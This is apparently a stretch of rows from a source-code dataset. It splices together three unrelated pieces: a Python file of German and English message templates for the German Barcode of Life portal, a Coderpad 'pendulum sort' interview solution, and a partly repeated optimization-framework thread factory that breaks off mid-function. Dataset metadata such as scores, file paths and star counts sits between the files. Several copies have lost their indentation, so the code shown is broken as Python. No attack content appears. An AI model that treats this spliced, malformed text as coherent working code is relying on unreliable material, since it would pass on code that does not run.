"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
'We have received Your registration for the taxonomic expertise {3} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
'en': 'The password and further tips werde sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
                              'en': 'An error occurred when uploading the collection sheet. Please send it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages is sent to the dev_group specified in production.ini
messages['error'] = {}
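# NOTE: this reassignment replaces the user-facing 'error' message defined earlier
# in this module; from here on the key holds the developer-facing error templates.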
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Transaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| de | 0.824417 | 100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125, 3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012, 4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093, 5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014, 5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341, 5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176, 5429405, 5430460, 5431215 Hallo {3} {1} {2}, die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben. Viele Grüße Ihr GBOL Team Hello {3} {1} {2} The expertise {0} of your GBOL account has been approved by the coordinator. Best regards, The GBOL Team Hallo {3} {1} {2}, die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt. Sie können sich bei Fragen im Kontakt-Bereich bei uns melden. Viele Grüße Ihr GBOL Team Hello {3} {1} {2} The expertise {0} of your GBOL account has been refused by the coordinator. If You have any questions regarding the GBOL approval process, please send us a note in the contact area. We will answer Your inquiry as soon as possible. Best regards, The GBOL Team {0}, eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf dem German Barcode of Life Webportal wurde gestellt. Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern: http://{1}/sammeln/change-password?link={2} Ihr Benutzername lautet: {3} Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite, auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig und läuft automatisch aus, falls Sie ihn nicht verwenden. Viele Grüße Das Team von German Barcode of Life {0}, a request for password reset for your useraccount on the German Barcode of Life webportal has been posed. You can change your password with the following link: http://{1}/sammeln/change-password?link={2} Your user name is: {3} Please note: this link can only be used once. The link will direct you to a website where you can enter a new password. The link is valid for one day. Best wishes, Your team from German Barcode of Life "Hallo {4} {2} {3} ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben. Sie können sich nun im dem Experten-Bereich anmelden. Viele Grüße Ihr GBOL Team Hello {4} {2} {3} Your GBOL account has been approved by the coordinator. You can now login into the expert area. Best regards, The GBOL Team "Hallo {4} {2} {3} ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt. Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden. Best regards, Ihr GBOL Team Hello {4} {2} {3} Your GBoL account has been refused by the coordinator. If You have any questions regarding the GBoL approval process, please send us a note in the contact area. We will answer Your inquiry as soon as possible. Best regards, The GBOL Team Guten Tag {0}, eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet. 
Gesendet am {1} Bestellung: Material: {2} Anzahl Verpackungseinheiten: {3} Taxonomische Gruppe: {4} Nummer erstes Sammelröhrchen: {5} Nummer letztes Sammelröhrchen: {6} Absender: {name} {street} {city} {country} Email: {email} # -- In case of an error one of these messages are send to the dev_group specified in production.ini Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden: Bestellzeit: {1} Koordinator (User-id): {0} Möglicher Trasaktions-Key: {9} Bestellung: Material: {2} Anzahl Verpackungseinheiten: {3} Taxonomische Gruppe (ID): {4} Nummer erstes Sammelröhrchen: {5} Nummer letztes Sammelröhrchen: {6} Bestellt von: User-ID: {7} Name: {8} Fehler: {10} | 1.907279 | 2 |
challenges/Backend Challenge/pendulum_sort.py | HernandezDerekJ/Interview | 0 | 9140 | """
Coderpad solution
"""
def pend(arr):
## arr = [2,3,5,1,4]
## vrr = [0,0,0,0,0]
var = [0] * len(arr)
    mid = (len(var) - 1) // 2  # floor division keeps the index an integer
## sort_arr = [1,2,3,4,5]
## vrr = [0,0,1,0,0]
sort_arr = sorted(arr)
var[mid] = sort_arr[0]
# ^
    # focus shouldn't be at the beginning of the array [1',2,3,4,5]
# ^
# it should be mid [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
# Now it can be flipped left and right for ever increment
# ^ ^
# sort_arr [1,2,3,4,5]
# ^ ^
# var [0,0,1,0,0]
arr_increment = 1
for i in range(1, mid + 1):
#By now the mid is the only position that is correct
#As we parse through var[], we also parse through arr[] and flip values from least to greatest
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid+i] = sort_arr[arr_increment]
arr_increment += 1
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid-i] = sort_arr[arr_increment]
arr_increment += 1
    # Even-length input: one element remains to be placed at the end
if ((len(sort_arr)-1) % 2 == 1):
# ^
# sort_arr [1,2,3,4,5,6]
# ^
# var [0,0,1,0,0,0]
var[len(arr) - 1] = sort_arr[len(arr) - 1]
    print(var)
if __name__ == "__main__":
arr = [5,1,3,6,2,4]
pend(arr)
arr = [5, 1, 3, 2, 4]
pend(arr)
arr = [10, 4, 1, 5, 4, 3, 7, 9]
pend(arr)
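    # Hand-traced expected output for the three calls above (mid stays an
    # integer thanks to the floor division in pend):
    #   [5, 1, 3, 6, 2, 4]        -> [5, 3, 1, 2, 4, 6]
    #   [5, 1, 3, 2, 4]           -> [5, 3, 1, 2, 4]
    #   [10, 4, 1, 5, 4, 3, 7, 9] -> [9, 5, 4, 1, 3, 4, 7, 10]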
| """
Coderpad solution
"""
def pend(arr):
## arr = [2,3,5,1,4]
## vrr = [0,0,0,0,0]
var = [0] * len(arr)
    mid = (len(var) - 1) // 2  # floor division keeps the index an integer
## sort_arr = [1,2,3,4,5]
## vrr = [0,0,1,0,0]
sort_arr = sorted(arr)
var[mid] = sort_arr[0]
# ^
    # focus shouldn't be at the beginning of the array [1',2,3,4,5]
# ^
# it should be mid [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
# Now it can be flipped left and right for ever increment
# ^ ^
# sort_arr [1,2,3,4,5]
# ^ ^
# var [0,0,1,0,0]
arr_increment = 1
for i in range(1, mid + 1):
#By now the mid is the only position that is correct
#As we parse through var[], we also parse through arr[] and flip values from least to greatest
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid+i] = sort_arr[arr_increment]
arr_increment += 1
# ^
# sort_arr [1,2,3,4,5]
# ^
# var [0,0,1,0,0]
var[mid-i] = sort_arr[arr_increment]
arr_increment += 1
    # Even-length input: one element remains to be placed at the end
if ((len(sort_arr)-1) % 2 == 1):
# ^
# sort_arr [1,2,3,4,5,6]
# ^
# var [0,0,1,0,0,0]
var[len(arr) - 1] = sort_arr[len(arr) - 1]
    print(var)
if __name__ == "__main__":
arr = [5,1,3,6,2,4]
pend(arr)
arr = [5, 1, 3, 2, 4]
pend(arr)
arr = [10, 4, 1, 5, 4, 3, 7, 9]
pend(arr)
| en | 0.778519 | Coderpad solution ## arr = [2,3,5,1,4] ## vrr = [0,0,0,0,0] ## sort_arr = [1,2,3,4,5] ## vrr = [0,0,1,0,0] # ^ # focus shouldn't be at beginning ofr array [1',2,3,4,5] # ^ # it should be mid [1,2,3,4,5] # ^ # var [0,0,1,0,0] # Now it can be flipped left and right for ever increment # ^ ^ # sort_arr [1,2,3,4,5] # ^ ^ # var [0,0,1,0,0] #By now the mid is the only position that is correct #As we parse through var[], we also parse through arr[] and flip values from least to greatest # ^ # sort_arr [1,2,3,4,5] # ^ # var [0,0,1,0,0] # ^ # sort_arr [1,2,3,4,5] # ^ # var [0,0,1,0,0] #Odd number of elements # ^ # sort_arr [1,2,3,4,5,6] # ^ # var [0,0,1,0,0,0] | 3.44496 | 3 |
swagger_server/controllers/threadFactory.py | garagonc/optimization-framework | 0 | 9141 | <gh_stars>0
import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
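        # NOTE: project_dir above is computed but not used; paths are resolved
        # against the container root "/usr/src/app" instead.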
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
        # Loads the model name if it was not given through the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
            time.sleep(60)  # seconds must be numeric, not a string
| import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
        # Loads the model name if it was not given through the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
